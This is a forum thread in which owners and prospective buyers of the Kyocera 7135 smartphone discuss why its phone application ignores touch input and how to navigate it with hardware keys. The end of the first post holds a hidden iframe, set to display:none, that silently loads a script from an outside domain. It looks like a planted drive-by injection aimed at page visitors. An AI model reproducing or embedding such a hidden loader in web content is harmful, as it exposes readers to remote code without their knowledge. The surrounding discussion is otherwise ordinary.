+ Reply to Thread

Screen Not Touch Sensitive in Phone App

I've been reading about the negative reviews on the 7135 because is not touch sensitive in the phone app. What is the limitation people see? I don't have a 7135 yet so it's not obvious to me. I know you can put it on speaker phone and access all of the palm features. Can someone explain?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    RayB

Re: Screen Not Touch Sensitive in Phone App

Originally posted by rjblake
    I've been reading about the negative reviews on the 7135 because is not touch sensitive in the phone app. What is the limitation people see? I don't have a 7135 yet so it's not obvious to me. I know you can put it on speaker phone and access all of the palm features. Can someone explain?
    It was a stupid observation by a reporter who spent all of five minutes with the phone. It has NO impact on useability in any way. It is just a single application, the Phone application - where you dial from, and have maybe 4 menu items where you can do things like save incoming phone numbers to the address book. This one application needs to be navigated with the up, down, and OK buttons, and if you touch one of ht emenu items with the stylus, it pops up a message saying that the application is not touch sensitive. You do not need to remain in the phone application once you receive or place a call, and the screen is touch sensitive in other applications even while on the phone.

Alan

I personally can't think of any reasons why I would want for the phone side to be touch screen. There are only a few selections available, and they are all easily accessed with the "ok" and up/down buttons. Maybe I'm forgetting some great feature from the 6035 days while on the phone side... but I don't know why people would want to take out their stylus (or use their fingers) to tap on the screen when you can just scroll and push "ok".
    Please visit my picture site: Robert-O-Rama :)

Re: Re: Screen Not Touch Sensitive in Phone App

Originally posted by alanb
    It was a stupid observation by a reporter who spent all of five minutes with the phone. It has NO impact on useability in any way.
    That's all true... but even a few people here on the boards who understand all that still wonder why they didn't make the phone app touch screen. And for the life of me I can't remember what was good about having it that way (like it was with the 6035).
    Please visit my picture site: Robert-O-Rama :)

I still don't have my 7135, but after reading the manual it appears to me 1) while in the phone app you must use the navigator key and 2) you also have the option of selecting the exact same functions in a PDA app and can use either the stylus on the touch screen or navigation key.

Therefore, the criticism of not being able to use the stylus on the touch screen in the phone app makes no sense whatever.
    RayB

Some people assume that there are buttons on the screen for the phone app. This is true for other hybrids, since they don't have hardware keypads. But not the Kyoceras....

jeh
    The most annoying thing about it to me is that about half the time, when I open the phone one-handed, my thumb touches the screen enough to make the warning pop up: "Phone application is not touch-sensitive!" (well, obviously it IS, or it wouldn't know to complain!) Then I have to press the "ok" button to get rid of the b-b. I wish it would just stop nagging me about it.

hear, hear (ha ha)!

Originally posted by jeh
    The most annoying thing about it to me is that about half the time, when I open the phone one-handed, my thumb touches the screen enough to make the warning pop up: "Phone application is not touch-sensitive!" (well, obviously it IS, or it wouldn't know to complain!) Then I have to press the "ok" button to get rid of the b-b. I wish it would just stop nagging me about it.
    I absolutely agree!!! For me it hasn't been a functionality issue (not having the screen touch sensitive for Phone app), it is just annoying. I am always accidentally triggering that warning, too, and it just ends up being a waste of time.

Originally posted by jeh
    Maybe this was the point! Many of my colleagues with non-flip smartphones (i.e.: the old Samsung) expressed concerns about their ears accidentally hitting the touch screen (and subsequently doing all sorts of unwanted things).
    What is particularly annoying about the 7135's phone app is that it appears to be touch sensitive just by the look of its layout, hence everyone's disappointment ("Damn, I forgot about that") whenever they try to use it as such.

jeh
    Ok, I see the point of the warning... but there ought to be a way to say "don't tell me about this again."